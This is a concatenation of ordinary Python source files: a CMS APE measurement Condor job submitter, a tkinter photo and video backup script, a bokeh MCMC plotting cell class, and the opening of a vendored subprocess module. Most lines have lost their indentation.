print("APE Measurement {} is scheduled to to an APE baseline measurement with a dataset that is not marked as isMC=True. Is this intended?".format(self.name))
ensurePathExists('{}/hists/{}'.format(base, self.name))
if not self.alignment.isDesign:
ensurePathExists('{}/hists/{}/apeObjects'.format(base, self.name))
def get_status(self):
return status_map[self.status]
def print_status(self):
print("APE Measurement {} in iteration {} is now in status {}".format(self.name, self.curIteration, self.get_status()))
# submit jobs for track refit and hit categorization
def submit_jobs(self):
toSubmit = []
allConditions = self.alignment.conditions+self.dataset.conditions+self.conditions
        allConditions = list({v['record']:v for v in allConditions}.values()) # deduplicate by record: in case of overlap the record defined last (from the dataset) is kept,
        # which is the same behaviour as if there were no overlap removal at all
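        # Illustrative example of the dedup above (hypothetical values):
        #   [{'record': 'R', 'tag': 'old', 'connect': c}, {'record': 'R', 'tag': 'new', 'connect': c}]
        #   collapses to [{'record': 'R', 'tag': 'new', 'connect': c}] -- only the last entry per record survives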
ensurePathExists("{}/test/autoSubmitter/workingArea".format(base))
        # If conditions are defined, create a file to load them from
rawFileName = "None"
conditionsFileName = "None"
if len(allConditions) > 0:
conditionsFileName = "{base}/python/conditions/conditions_{name}_iter{iterNo}_cff.py".format(base=base,name=self.name, iterNo=self.curIteration)
rawFileName = "conditions_{name}_iter{iterNo}_cff".format(name=self.name, iterNo=self.curIteration)
with open(conditionsFileName, "w") as fi:
from autoSubmitterTemplates import conditionsFileHeader
fi.write(conditionsFileHeader)
from autoSubmitterTemplates import conditionsTemplate
for condition in allConditions:
fi.write(conditionsTemplate.format(record=condition["record"], connect=condition["connect"], tag=condition["tag"]))
alignmentNameToUse = self.alignment.alignmentName
if self.alignment.hasAlignmentCondition:
alignmentNameToUse = "fromConditions"
lastIter = (self.curIteration==self.maxIterations) and not self.alignment.isDesign
inputCommands = "sample={sample} fileNumber={fileNo} iterNumber={iterNo} lastIter={lastIter} alignRcd={alignRcd} maxEvents={maxEvents} globalTag={globalTag} measurementName={name} conditions={conditions} cosmics={cosmics}".format(sample=self.dataset.sampleType,fileNo="$1",iterNo=self.curIteration,lastIter=lastIter,alignRcd=alignmentNameToUse, maxEvents=self.maxEvents, globalTag=self.alignment.globalTag, name=self.name, conditions=rawFileName,cosmics=self.dataset.isCosmics)
from autoSubmitterTemplates import condorJobTemplate
jobFileContent = condorJobTemplate.format(base=base, inputFile="$2", inputCommands=inputCommands)
jobFileName = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
with open(jobFileName, "w") as jobFile:
jobFile.write(jobFileContent)
# create a batch job file for each input file
arguments = ""
from autoSubmitterTemplates import condorArgumentTemplate
for i in range(self.dataset.nFiles):
inputFile = self.dataset.fileList[i]
fileNumber = i+1
arguments += condorArgumentTemplate.format(fileNumber=fileNumber, inputFile=inputFile)
# build condor submit script
date = subprocess.check_output(["date", "+%m_%d_%H_%M_%S"]).strip()
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFileTemp = sub+"_error_{}.txt"
errorFile = errorFileTemp.format("$(ProcId)")
outputFile = sub+"_output_$(ProcId).txt"
logFileTemp= sub+"_condor_{}.log"
logFile = logFileTemp.format("$(ProcId)")
jobFile = sub+".tcsh"
jobName = "{}_{}".format(self.name, self.curIteration)
for i in range(self.dataset.nFiles):
# make file empty if it existed before
with open(logFileTemp.format(i), "w") as fi:
pass
# create submit file
from autoSubmitterTemplates import condorSubTemplate
from autoSubmitterTemplates import condorSubTemplateCAF
if use_caf:
submitFileContent = condorSubTemplateCAF.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
else:
submitFileContent = condorSubTemplate.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
submitFileName = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
with open(submitFileName, "w") as submitFile:
submitFile.write(submitFileContent)
# submit batch
from autoSubmitterTemplates import submitCondorTemplate
subOut = subprocess.check_output(submitCondorTemplate.format(subFile=submitFileName), shell=True).strip()
if len(subOut) == 0:
print("Running on environment that does not know bsub command or ssh session is timed out (ongoing for longer than 24h?), exiting")
sys.exit()
cluster = subOut.split(" ")[-1][:-1]
for i in range(self.dataset.nFiles):
# list contains condor log files from which to read when job is terminated to detect errors
self.runningJobs.append((logFileTemp.format(i), errorFileTemp.format(i), "{}.{}".format(cluster, i)))
self.status = STATE_BJOBS_WAITING
self.print_status()
def check_jobs(self):
lastStatus = self.status
stillRunningJobs = []
# check all still running jobs
for logName, errName, jobId in self.runningJobs:
# read condor logs instead of doing condor_q or similar, as it is much faster
if not os.path.isfile(logName):
print("{} does not exist even though it should, marking job as failed".format(logName))
self.failedJobs.append( (logName, errName) )
break
with open(logName, "r") as logFile:
log = logFile.read()
if not "submitted" in log:
print("{} was apparently not submitted, did you empty the log file or is condor not working?".format(jobId))
self.failedJobs.append( (logName, errName) )
if "Job was aborted" in log:
print("Job {} of measurement {} in iteration {} was aborted".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
elif "Job terminated" in log:
if "Normal termination (return value 0)" in log:
foundErr = False
with open(errName, "r") as err:
for line in err:
if "Fatal Exception" in line.strip():
foundErr = True
break
if not foundErr:
print("Job {} of measurement {} in iteration {} finished successfully".format(jobId, self.name, self.curIteration))
else:
# Fatal error in stderr
print("Job {} of measurement {} in iteration {} has a fatal error, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
# nonzero return value
print("Job {} of measurement {} in iteration {} failed, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
stillRunningJobs.append( (logName, errName, jobId) )
self.runningJobs = stillRunningJobs
# at least one job failed
if len(self.failedJobs) > 0:
self.status = STATE_BJOBS_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
elif len(self.runningJobs) == 0:
self.status = STATE_BJOBS_DONE
print("All condor jobs of APE measurement {} in iteration {} are done".format(self.name, self.curIteration))
# remove files
if delete_logs_after_finish:
submitFile = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
jobFile = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
os.remove(submitFile)
os.remove(jobFile)
for i in range(self.dataset.nFiles):
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFile = sub+"_error_{}.txt".format(i)
outputFile = sub+"_output_{}.txt".format(i)
logFile = sub+"_condor_{}.log".format(i)
os.remove(errorFile)
os.remove(outputFile)
os.remove(logFile)
if lastStatus != self.status:
self.print_status()
# merges files from jobs
def do_merge(self):
self.status = STATE_MERGE_WAITING
if self.alignment.isDesign:
folderName = '{}/hists/{}/baseline'.format(base, self.name)
else:
folderName = '{}/hists/{}/iter{}'.format(base, self.name, self.curIteration)
# (re)move results from previous measurements before creating folder
if os.path.isdir(folderName):
if os.path.isdir(folderName+"_old"):
shutil.rmtree("{}_old".format(folderName))
os.rename(folderName, folderName+"_old")
os.makedirs(folderName)
# This is so that the structure of the tree can be retrieved by ApeEstimatorSummary.cc and the tree does not have to be rebuilt
        if self.curIteration > 0 and not self.alignment.isDesign: # the isDesign check is redundant here because a design measurement always ends after iteration 0
shutil.copyfile('{}/hists/{}/iter{}/allData_iterationApe.root'.format(base, self.name, self.curIteration-1),folderName+"/allData_iterationApe.root")
fileNames = ['{}/hists/{}/{}{}.root'.format(base, self.name, self.dataset.sampleType, str(i)) for i in range(1, self.dataset.nFiles+1)]
fileString = " ".join(fileNames)
from autoSubmitterTemplates import mergeTemplate
        merge_result = subprocess.call(mergeTemplate.format(path=folderName, inputFiles=fileString), shell=True) # returns exit code (0 if no error occurred)
for name in fileNames:
os.remove(name)
if rootFileValid("{}/allData.root".format(folderName)) and merge_result == 0:
self.status = STATE_MERGE_DONE
else:
self.status = STATE_MERGE_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# calculates APE
def do_summary(self):
self.status = STATE_SUMMARY_WAITING
from autoSubmitterTemplates import summaryTemplate
if self.alignment.isDesign:
#use measurement name as baseline folder name in this case
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.name)
else:
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.alignment.baselineDir)
        summary_result = subprocess.call(summaryTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occurred)
if summary_result == 0:
self.status = STATE_SUMMARY_DONE
else:
self.status = STATE_SUMMARY_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# saves APE to .db file so it can be read out next iteration
def do_local_setting(self):
self.status = STATE_LOCAL_WAITING
from autoSubmitterTemplates import localSettingTemplate
inputCommands = "iterNumber={} setBaseline={} measurementName={}".format(self.curIteration,self.alignment.isDesign,self.name)
        local_setting_result = subprocess.call(localSettingTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occurred)
if local_setting_result == 0:
self.status = STATE_LOCAL_DONE
else:
self.status = STATE_LOCAL_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
def finish_iteration(self):
print("APE Measurement {} just finished iteration {}".format(self.name, self.curIteration))
if self.curIteration < self.maxIterations:
self.curIteration += 1
self.status = STATE_ITERATION_START
else:
self.status = STATE_FINISHED
self.finishTime = subprocess.check_output(["date"]).strip()
print("APE Measurement {}, which was started at {} was finished after {} iterations, at {}".format(self.name, self.startTime, self.curIteration, self.finishTime))
def kill(self):
from autoSubmitterTemplates import killJobTemplate
for log, err, jobId in self.runningJobs:
subprocess.call(killJobTemplate.format(jobId=jobId), shell=True)
self.runningJobs = []
self.status = STATE_NONE
def purge(self):
self.kill()
folderName = '{}/hists/{}'.format(base, self.name)
shutil.rmtree(folderName)
# remove log-files as well?
def run_iteration(self):
global threadcounter
global measurements
threadcounter.acquire()
try:
if self.status == STATE_ITERATION_START:
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
try:
self.submit_jobs()
save("measurements", measurements)
except Exception as e:
# this is needed in case the scheduler goes down
print("Error submitting jobs for APE measurement {}".format(self.name))
print(e)
return
if self.status == STATE_BJOBS_WAITING:
# check if bjobs are finished
self.check_jobs()
save("measurements", measurements)
if self.status == STATE_BJOBS_DONE:
# merge files
self.do_merge()
save("measurements", measurements)
if self.status == STATE_MERGE_DONE:
# start summary
self.do_summary()
save("measurements", measurements)
if self.status == STATE_SUMMARY_DONE:
# start local setting (only if not a baseline measurement)
if self.alignment.isDesign:
self.status = STATE_LOCAL_DONE
else:
self.do_local_setting()
save("measurements", measurements)
if self.status == STATE_LOCAL_DONE:
self.finish_iteration()
save("measurements", measurements)
# go to next iteration or finish measurement
if self.status == STATE_BJOBS_FAILED or \
self.status == STATE_MERGE_FAILED or \
self.status == STATE_SUMMARY_FAILED or \
self.status == STATE_LOCAL_FAILED or \
self.status == STATE_INVALID_CONDITIONS or \
self.status == STATE_FINISHED:
with open(history_file, "a") as fi:
fi.write("APE measurement {name} which was started at {start} finished at {end} with state {state} in iteration {iteration}\n".format(name=self.name, start=self.startTime, end=self.finishTime, state=self.get_status(), iteration=self.curIteration))
if self.status == STATE_FINISHED:
global finished_measurements
finished_measurements[self.name] = self
save("finished", finished_measurements)
else:
global failed_measurements
failed_measurements[self.name] = self
self.status = STATE_NONE
save("failed", failed_measurements)
save("measurements", measurements)
if self.status == STATE_ITERATION_START: # this ensures that jobs do not go into idle if many measurements are done simultaneously
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
self.submit_jobs()
save("measurements", measurements)
finally:
threadcounter.release()
def main():
parser = argparse.ArgumentParser(description="Automatically run APE measurements")
parser.add_argument("-c", "--config", action="append", dest="configs", default=[],
help="Config file that has list of measurements")
parser.add_argument("-k", "--kill", action="append", dest="kill", default=[],
help="List of measurement names to kill (=remove from list and kill all bjobs)")
parser.add_argument("-p", "--purge", action="append", dest="purge", default=[],
help="List of measurement names to purge (=kill and remove folder)")
parser.add_argument("-r", "--resume", action="append", dest="resume", default=[],
help="Resume interrupted APE measurements which are stored in shelves (specify shelves)")
parser.add_argument("-d", "--dump", action="store", dest="dump", default=None,
help='Specify in which .shelve file to store the measurements')
parser.add_argument("-n", "--ncores", action="store", dest="ncores", default=1, type=int,
help='Number of threads running in parallel')
parser.add_argument("-C", "--caf",action="store_true", dest="caf", default=False,
help="Use CAF queue for condor jobs")
args = parser.parse_args()
global base
global clock_interval
global shelve_name
global threadcounter
global lock
global use_caf
use_caf = args.caf
enableCAF(use_caf)
threadcounter = threading.BoundedSemaphore(args.ncores)
lock = threading.Lock()
if args.dump != None: # choose different file than default
shelve_name = args.dump
elif args.resume != []:
shelve_name = args.resume[0]
try:
base = os.environ['CMSSW_BASE']+"/src/Alignment/APEEstimation"
except KeyError:
print("No CMSSW environment was set, exiting")
sys.exit()
killTargets = []
purgeTargets = []
for toConvert in args.kill:
killTargets += replaceAllRanges(toConvert)
for toConvert in args.purge:
purgeTargets += replaceAllRanges(toConvert)
global measurements
measurements = []
global finished_measurements
finished_measurements = {}
global failed_measurements
failed_measurements = {}
if args.resume != []:
for resumeFile in args.resume:
try:
sh = shelve.open(resumeFile)
resumed = sh["measurements"]
resumed_failed = sh["failed"]
resumed_finished = sh["finished"]
sh.close()
for res in resumed:
measurements.append(res)
print("Measurement {} in state {} in iteration {} was resumed".format(res.name, res.get_status(), res.curIteration))
# Killing and purging is done here, because it doesn't make
# sense to kill or purge a measurement that was just started
for to_kill in args.kill:
if res.name == to_kill:
res.kill()
for to_purge in args.purge:
if res.name == to_purge:
res.purge()
failed_measurements.update(resumed_failed)
finished_measurements.update(resumed_finished)
except IOError:
print("Could not resume because {} could not be opened, exiting".format(shelve_name))
sys.exit()
# read out from config file
if args.configs != []:
config = ConfigParser.RawConfigParser()
config.optionxform = str
config.read(args.configs)
# read measurement names
meas = [str(x.split("ape:")[1]) for x in list(config.keys()) if x.startswith("ape:")]
for name in meas:
if name in [x.name for x in measurements]:
print("Error: APE Measurement with name {} already exists, skipping".format(name))
continue
settings = dict(config.items("ape:{}".format(name)))
measurement = ApeMeasurement(name, config, settings)
if measurement.status >= STATE_ITERATION_START and measurement.status <= STATE_FINISHED:
measurements.append(measurement)
print("APE Measurement {} was started".format(measurement.name))
while True:
# remove finished and failed measurements
measurements = [measurement for measurement in measurements if not (measurement.status==STATE_NONE or measurement.status == STATE_FINISHED)]
save("measurements", measurements)
save("failed", failed_measurements)
save("finished", finished_measurements)
list_threads = []
for measurement in measurements:
t = threading.Thread(target=measurement.run_iteration)
list_threads.append(t)
t.start()
# wait for iterations to finish
for t in list_threads:
t.join()
if len(measurements) == 0:
print("No APE measurements are active, exiting")
break
try: # so that interrupting does not give an error message and just ends the program
time_remaining = clock_interval
while time_remaining > 0:
print("Sleeping for {} seconds, you can safely [CTRL+C] now".format(time_remaining))
time.sleep(1)
time_remaining -= 1
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
print("")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
except KeyboardInterrupt:
sys.exit(0)
if __name__ == "__main__":
main()
|
backup.py
|
import tkinter as tk
from tkinter import filedialog
import shutil
import os.path
import time
import datetime
from subprocess import Popen, PIPE
from threading import Thread
from PIL import Image
from PIL.ExifTags import TAGS
def mv(src, dest):
num = 1
if os.path.exists(dest):
parts = list(os.path.splitext(dest))
filename = parts[0]
while os.path.exists(dest):
parts[0] = '{}-{}'.format(filename, num)
dest = ''.join(parts)
num += 1
shutil.move(src, dest)
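# Illustrative behaviour sketch (not part of the original script): mv() keeps
# appending an increasing numeric suffix until the destination name is free,
# so files with identical names never overwrite each other. Assuming
# '/dest/photo.jpg' already exists:
#   mv('/src/photo.jpg', '/dest/photo.jpg')  # -> writes '/dest/photo-1.jpg'
#   mv('/src/photo.jpg', '/dest/photo.jpg')  # -> writes '/dest/photo-2.jpg'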
def get_exif_data(filename):
"""Get embedded EXIF data from image file.
    Source: http://www.endlesslycurious.com/2011/05/11/extracting-image-exif-data-with-python/
"""
ret = {}
try:
img = Image.open(filename)
if hasattr(img, '_getexif'):
exif_info = img._getexif()
if exif_info is not None:
for tag, value in list(exif_info.items()):
decoded = TAGS.get(tag, tag)
ret[decoded] = value
except IOError:
print('IOERROR ' + filename)
return ret
def get_m_timestamp(filename):
modified = os.path.getmtime(filename)
accessed = os.path.getatime(filename)
created = os.path.getctime(filename)
t = min(modified, accessed, created)
return datetime.datetime.fromtimestamp(t)
def get_timestamp(filename):
exif_info = get_exif_data(filename)
if 'DateTimeOriginal' in exif_info:
datestring = exif_info['DateTimeOriginal']
return datetime.datetime.strptime(datestring, '%Y:%m:%d %H:%M:%S')
else:
return datetime.datetime.fromtimestamp((os.path.getctime(filename)))
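# Hedged example of the preference order above (filename and values are
# hypothetical): the EXIF 'DateTimeOriginal' tag wins when the image carries
# one, otherwise the filesystem creation time is used.
#   get_timestamp('IMG_0001.jpg')
#   # -> datetime.datetime(2019, 5, 11, 14, 30, 12)  (from EXIF if present,
#   #    else from os.path.getctime)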
def get_size(f):
ps = Popen('du -sh {}'.format(f), shell=True, stdout=PIPE, stderr=PIPE)
output = ps.stdout.readlines()[0].strip()
size = output.split()[0]
return size
def progress(source, target):
print('calculating progress')
while True:
time.sleep(10)
if os.path.exists(source) and os.path.exists(target):
print('{}/{}'.format(get_size(target), get_size(source)))
else:
pass
def get_original_filename(path):
return os.path.split(os.path.splitext(path)[0])[-1]
def should_ignore(cur_dir, items):
items_to_ignore = []
if 'cache' in items:
items_to_ignore.append('cache')
thumbnails = [x for x in items if x.endswith('.thumbnail')]
if thumbnails:
items_to_ignore.extend(thumbnails)
return items_to_ignore
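# Usage sketch: should_ignore() has the (dir, names) -> names-to-skip
# signature expected by the ignore= hook of shutil.copytree, dropping the
# 'cache' directory and any '*.thumbnail' entries. Paths below are
# illustrative only:
#   shutil.copytree('/media/camera/DCIM', '/backup/temp_backup',
#                   ignore=should_ignore)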
def get_defaults():
default_arguments = {}
default_dest = '/media/fruitschen/新加卷/小树照片temp'
if os.path.exists(default_dest):
default_arguments.update({
'default_dest': default_dest,
})
possible_default_froms = [
'/media/fruitschen/EOS_DIGITAL/DCIM/100CANON',
]
for i in range(10):
phone = '/run/user/1000/gvfs/mtp:host=%5Busb%3A003%2C00{}%5D/内部存储/DCIM/Camera'.format(i)
possible_default_froms.append(phone)
for default_from in possible_default_froms:
if os.path.exists(default_from):
default_arguments.update({
'default_from': default_from,
})
return default_arguments
def do_backup(source, target, append_timestamp):
temp_target_dir = os.path.join(target, 'temp_backup')
print('Backup in progress')
    t = Thread(target=progress, args=(source, temp_target_dir), daemon=True)  # daemon: the progress loop never exits on its own
t.start()
shutil.copytree(source, temp_target_dir, ignore=should_ignore)
t.join(timeout=1)
print('Backup done. ')
print('Processing files')
results_by_month = {}
for root, dirs, files in os.walk(temp_target_dir):
photos = [x for x in files if '.jpg' in x.lower()]
for f in photos:
photo_path = os.path.join(root, f)
timestamp = get_timestamp(photo_path)
original_filename = get_original_filename(photo_path)
extra = ''
if append_timestamp:
extra = original_filename
desired_filename = 'IMG_{}{}.jpg'.format(timestamp.strftime('%Y-%m-%d-%H%M%S'), extra)
file_month = timestamp.strftime('%Y-%m')
file_date = timestamp.strftime('%Y-%m-%d')
result = {
'file': photo_path,
'type': 'photo',
'created': get_timestamp(photo_path),
'file_date': file_date,
'desired_filename': desired_filename,
}
if file_month in results_by_month:
pass
else:
results_by_month[file_month] = []
results_by_month[file_month].append(result)
video_formats = ['.avi', '.mp4', '.mts']
videos = [x for x in files if os.path.splitext(x.lower())[1] in video_formats]
for f in videos:
video_path = os.path.join(root, f)
ext = os.path.splitext(video_path)[-1]
timestamp = get_m_timestamp(video_path)
original_filename = get_original_filename(video_path)
extra = ''
if append_timestamp:
extra = original_filename
desired_filename = 'video_{}{}{}'.format(timestamp.strftime('%Y-%m-%d-%H%M%S'), extra, ext)
file_month = timestamp.strftime('%Y-%m')
file_date = timestamp.strftime('%Y-%m-%d')
result = {
'file': video_path,
'type': 'video',
'created': timestamp,
'file_date': file_date,
'desired_filename': desired_filename,
}
if file_month in results_by_month:
pass
else:
results_by_month[file_month] = []
results_by_month[file_month].append(result)
photos_count = 0
videos_count = 0
for month, results in list(results_by_month.items()):
month_photos_count = 0
month_videos_count = 0
print('Processing for {}'.format(month))
print('{} files'.format(len(results)))
month_dir = os.path.join(temp_target_dir, month)
if not os.path.exists(month_dir):
os.makedirs(month_dir)
for result in results:
file_date = result['file_date']
date_dir = os.path.join(month_dir, file_date)
if not os.path.exists(date_dir):
os.makedirs(date_dir)
desired_path = os.path.join(date_dir, result['desired_filename'])
mv(result['file'], desired_path)
if result['type'] == 'photo':
photos_count += 1
month_photos_count += 1
if result['type'] == 'video':
videos_count += 1
month_videos_count += 1
        print('{} photos'.format(month_photos_count))
        print('{} videos'.format(month_videos_count))
print()
os.rename(temp_target_dir, temp_target_dir.replace('temp_backup', 'backup_{}'.format(
datetime.datetime.now().strftime('%Y-%m-%d-%H%M'))))
print('Done processing photos')
print('{} photos in total'.format(photos_count))
print('{} videos in total'.format(videos_count))
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.default_arguments = get_defaults()
self.from_dir = self.default_arguments.get('default_from', '')
self.dest_dir = self.default_arguments.get('default_dest', '')
self.create_widgets()
def create_widgets(self):
self.from_dir_button = tk.Button(self)
self.from_dir_button["text"] = "From:\n {}\n(click me to change)".format(self.from_dir, )
self.from_dir_button["command"] = self.update_from_dir
self.from_dir_button.pack(side="top")
self.dest_dir_button = tk.Button(self)
self.dest_dir_button["text"] = "To: \n{}\n(click me to change)".format(self.dest_dir, )
self.dest_dir_button["command"] = self.update_dest_dir
self.dest_dir_button.pack(side="top")
self.append_timestamp_val = tk.BooleanVar()
self.append_timestamp = False
self.append_widget = tk.Checkbutton(
self, text='append timestamp and keep original filename',
command=self.append_timestamp_changed, variable=self.append_timestamp_val,
onvalue=True, offvalue=False)
self.append_widget.pack(side="top")
self.backup_button = tk.Button(self, text='Backup', fg='blue', command=self.backup)
self.backup_button.pack(side="top")
self.quit = tk.Button(self, text="QUIT", fg="red",
command=self.master.destroy)
self.quit.pack(side="top")
def update_from_dir(self):
value = filedialog.askdirectory(initialdir = self.from_dir, title = "From Directory")
if value:
self.from_dir = value
self.from_dir_button["text"] = "From {}\n(click me to change)".format(self.from_dir, )
print("From Directory Changed: {}!".format(self.from_dir))
def update_dest_dir(self):
        value = filedialog.askdirectory(initialdir = self.dest_dir, title = "To Directory")
if value:
self.dest_dir = value
self.dest_dir_button["text"] = "From {}\n(click me to change)".format(self.dest_dir, )
print("To Directory Changed: {}!".format(self.dest_dir))
def append_timestamp_changed(self):
value = self.append_timestamp_val.get()
self.append_timestamp = value
print('append_timestamp_changed: {}'.format(value))
def backup(self):
do_backup(self.from_dir, self.dest_dir, self.append_timestamp)
if __name__ == '__main__':
root = tk.Tk()
app = Application(master=root)
app.master.title("Backup")
app.master.maxsize(1000, 400)
app.mainloop()
|
variable_cell.py
|
from ..interfaces.cell import Cell
from ..utils.stats import find_x_range
from ..utils.constants import BORDER_COLORS
from bokeh.models import Toggle, Div
import numpy as np
import threading
from abc import abstractmethod
class VariableCell(Cell):
def __init__(self, name, control):
"""
Parameters:
--------
        name        A String within the set {"<variableName>"}.
        control     A Control object.
        Sets:
        -----
        x_range     Dict of figure x-axis ranges, keyed by space.
"""
self.source = {}
self.samples = {}
self._all_samples = {}
self.x_range = {}
Cell.__init__(self, name, control)
self._toggle = {}
self._div = {}
self._initialize_toggle_div()
## DATA
def get_samples(self, space):
"""
Retrieves MCMC samples of <space> into a numpy.ndarray and
sets an entry into self._all_samples Dict.
"""
space_gsam = space
if self._data.get_var_type(self.name) == "observed":
if space == "posterior" and "posterior_predictive" in self._data.get_spaces():
space_gsam = "posterior_predictive"
elif space == "prior" and "prior_predictive" in self._data.get_spaces():
space_gsam = "prior_predictive"
self._all_samples[space] = self._data.get_samples(self.name, space_gsam).T
# compute x_range
self.x_range[space] = find_x_range(self._all_samples[space])
def get_data_for_cur_idx_dims_values(self, space):
"""
Returns a numpy.ndarray of the MCMC samples of the <name>
parameter for current index dimensions values.
Returns:
--------
A numpy.ndarray.
"""
if space in self._all_samples:
data = self._all_samples[space]
else:
raise ValueError
for dim_name, dim_value in self.cur_idx_dims_values.items():
data = data[dim_value]
return np.squeeze(data).T
## INITIALIZATION
def _initialize_plot(self):
for space in self.spaces:
self.get_samples(space)
self.initialize_cds(space)
self.initialize_fig(space)
self.initialize_glyphs(space)
@abstractmethod
def initialize_fig(self, space):
pass
@abstractmethod
def initialize_cds(self, space):
pass
@abstractmethod
def initialize_glyphs(self, space):
pass
## WIDGETS
@abstractmethod
def widget_callback(self, attr, old, new, w_title, space):
pass
## UPDATE
@abstractmethod
def update_cds(self, space):
pass
def sample_inds_callback(self, space, attr, old, new):
"""
Updates cds when indices of selected samples -- Cell._sample_inds--
are updated.
"""
self.ic.add_selection_threads(space, threading.Thread(target = self._sample_inds_thread, args = (space,), daemon = True))
self.ic.sel_lock_event.set()
def _sample_inds_thread(self, space):
self.update_cds(space)
def compute_intersection_of_samples(self, space):
"""
Computes intersection of sample points based on user's
restrictions per parameter.
"""
sel_var_inds = self.ic.get_sel_var_inds()
sp_keys = [k for k in sel_var_inds if k[0] == space]
if len(sp_keys)>1:
sets = []
for i in range(0, len(sp_keys)):
sets.append(set(sel_var_inds[sp_keys[i]]))
            common = set.intersection(*sorted(sets, key = len))
            self.ic.set_sample_inds(space, dict(inds = list(common)))
elif len(sp_keys) == 1:
self.ic.set_sample_inds(space, dict(inds = sel_var_inds[sp_keys[0]]))
else:
self.ic.set_sample_inds(space, dict(inds = []))
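    # Illustrative sketch of the selection logic above (keys and indices are
    # made up): with
    #   sel_var_inds = {("posterior", "mu"): [1, 2, 3],
    #                   ("posterior", "sigma"): [2, 3, 4]}
    # the per-variable index sets are intersected, so set_sample_inds()
    # receives {2, 3} and every cell in that space redraws using only the
    # samples that satisfy all restrictions simultaneously.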
def _initialize_toggle_div(self):
""""
Creates the toggle headers of each variable node.
"""
for space in self.spaces:
width = self.plot[space].plot_width
height = 40
sizing_mode = self.plot[space].sizing_mode
label = self.name + " ~ " + self._data.get_var_dist(self.name)
text = """parents: %s <br>dims: %s"""%(self._data.get_var_parents(self.name), list(self._data.get_idx_dimensions(self.name)))
if sizing_mode == 'fixed':
self._toggle[space] = Toggle(label = label, active = False,
width = width, height = height, sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text,
width = width, height = height, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
elif sizing_mode == 'scale_width' or sizing_mode == 'stretch_width':
self._toggle[space] = Toggle(label = label, active = False,
height = height, sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text,
height = height, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
elif sizing_mode == 'scale_height' or sizing_mode == 'stretch_height':
self._toggle[space] = Toggle(label = label, active = False,
width = width, sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text,
width = width, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
else:
self._toggle[space] = Toggle(label = label, active = False,
sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
self._toggle[space].js_link('active', self.plot[space], 'visible')
def get_max_prob(self, space):
"""
Gets highest point --max probability-- of cds
"""
max_sv = -1
max_rv = -1
if self.source[space].data['y'].size:
max_sv = self.source[space].data['y'].max()
if hasattr(self,'reconstructed') and self.reconstructed[space].data['y'].size:
max_rv = self.reconstructed[space].data['y'].max()
return max([max_sv,max_rv])
|
pproc.py
|
# borrowed from python 2.5.2c1
# Copyright (c) 2003-2005 by Peter Astrand <[email protected]>
# Licensed to PSF under a Contributor Agreement.
import sys
mswindows = (sys.platform == "win32")
import os
import types
import traceback
import gc
class CalledProcessError(Exception):
def __init__(self, returncode, cmd):
self.returncode = returncode
self.cmd = cmd
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
if mswindows:
import threading
import msvcrt
if 0:
import pywintypes
from win32api import GetStdHandle, STD_INPUT_HANDLE, \
STD_OUTPUT_HANDLE, STD_ERROR_HANDLE
from win32api import GetCurrentProcess, DuplicateHandle, \
GetModuleFileName, GetVersion
from win32con import DUPLICATE_SAME_ACCESS, SW_HIDE
from win32pipe import CreatePipe
from win32process import CreateProcess, STARTUPINFO, \
GetExitCodeProcess, STARTF_USESTDHANDLES, \
STARTF_USESHOWWINDOW, CREATE_NEW_CONSOLE
from win32event import WaitForSingleObject, INFINITE, WAIT_OBJECT_0
else:
from _subprocess import *
class STARTUPINFO:
dwFlags = 0
hStdInput = None
hStdOutput = None
hStdError = None
wShowWindow = 0
class pywintypes:
error = IOError
else:
import select
import errno
import fcntl
import pickle
__all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "CalledProcessError"]
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
try:
False
except NameError:
False = 0
True = 1
_active = []
def _cleanup():
for inst in _active[:]:
if inst.poll(_deadstate=sys.maxint) >= 0:
try:
_active.remove(inst)
except ValueError:
pass
PIPE = -1
STDOUT = -2
def call(*popenargs, **kwargs):
